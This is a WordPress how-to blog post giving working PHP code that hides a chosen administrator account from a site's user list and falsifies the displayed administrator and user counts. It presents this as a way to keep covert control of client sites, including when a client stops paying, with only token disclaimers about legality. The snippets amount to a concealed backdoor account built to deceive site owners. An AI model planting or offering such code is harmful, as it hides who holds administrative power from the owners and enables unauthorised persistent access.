How to hide your administrator account on a WordPress site

There are situations where your administrator account from the user list on a WordPress site.

One of those situations may be when you have a client who requested full access to their site. When they are not very computer-literate, they might “accidentally” deleted your admin account. When an emergency arises, and you have no admin access to the site, you will need to hack around in the database editing to regain access.

Another situation may be when you rent out a site, and the client stops making their regular payments. A hidden admin account ensures you can regain access to and control of the site.

Just make sure you don’t add little “backdoors” to sites you have no business of accessing anymore, since this is illegal.

Backdoor is also called a trapdoor. Backdoor is an undocumented method of bypassing normal authentication or securing remote access to a computer. In other words, it is an illegal method of gaining access to a program, online service or an entire computer system. The backdoor is written by the programmer who creates the code for the program. Often, a backdoor is a potential security risk.

USlegal.com

When you have a valid – and legal – reason to hide your administrator account from prying eyes, then this is the way to do it.

Hiding the administrator account from the list of users

The code below hides the user with username XXXXXX from the list of users on your client’s WordPress site (Users >> All Users). Of course, you need to change both instances of XXXXXX to the username of your choosing.

Copy this code into your theme’s functions.php file. You can find your theme’s functions.php file in folder /wp-content/themes/your(sub)theme/ on your site’s server.

//* Hide this administrator account from the users list
add_action('pre_user_query','site_pre_user_query');
function site_pre_user_query($user_search) {
	global $current_user;
	$username = $current_user->user_login;
 
	if ($username == 'XXXXXX') {
	}
 
	else {
	global $wpdb;
    $user_search->query_where = str_replace('WHERE 1=1',
      "WHERE 1=1 AND {$wpdb->users}.user_login != 'XXXXXX'",$user_search->query_where);
  }
}

Funny thing is, the code snippet still shows your account when you are logged in, but hides it from other users.

Change the number of administrators on the site

The code above hides the selected admin account itself from the list of users. However, the number of users (All) and the number of admins (administrator) in the left corner above the user list will still include this account. This might tick off certain site owners.

Luckily, it’s not too difficult to solve this. Though I’ve seen numerous solutions that just got rid of the counts altogether, this code takes both numbers and subtract 1. Place this code in the functions.php below the code snippet above.

//* Show number of admins minus 1
add_filter("views_users", "site_list_table_views");
function site_list_table_views($views){
   $users = count_users();
   $admins_num = $users['avail_roles']['administrator'] - 1;
   $all_num = $users['total_users'] - 1;
   $class_adm = ( strpos($views['administrator'], 'current') === false ) ? "" : "current";
   $class_all = ( strpos($views['all'], 'current') === false ) ? "" : "current";
   $views['administrator'] = '<a href="users.php?role=administrator" class="' . $class_adm . '">' . translate_user_role('Administrator') . ' <span class="count">(' . $admins_num . ')</span></a>';
   $views['all'] = '<a href="users.php" class="' . $class_all . '">' . __('All') . ' <span class="count">(' . $all_num . ')</span></a>';
   return $views;
}

Using both snippets will hide the selected administrator account from the site user’s view. Just make sure you don’t do anything illegal.

Do you hide your admin account from your client’s eyes? What is your reasoning for hiding your administrator account? Share your experiences in the comments below.

Resources

Leave a Reply

avatar

This site uses Akismet to reduce spam. Learn how your comment data is processed.

  Subscribe  
Notify of